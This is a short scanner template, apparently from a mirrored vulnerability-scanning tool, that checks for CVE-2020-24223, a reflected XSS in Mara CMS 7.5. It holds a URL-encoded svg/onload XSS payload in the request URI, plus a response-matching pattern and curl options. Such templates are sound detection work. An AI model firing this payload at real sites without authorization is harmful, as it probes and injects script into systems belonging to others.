mirror of
https://github.com/DeNNiiInc/UltyScan.git
synced 2026-04-17 20:35:59 +00:00
9 lines
285 B
Bash
9 lines
285 B
Bash
AUTHOR='@xer0dayz'
|
|
VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS'
|
|
URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E'
|
|
METHOD='GET'
|
|
MATCH="<svg/onload=alert\(1337\)>"
|
|
SEVERITY='P3 - MEDIUM'
|
|
CURL_OPTS="--user-agent '' -s -L --insecure"
|
|
SECONDARY_COMMANDS=''
|
|
GREP_OPTIONS='-i' |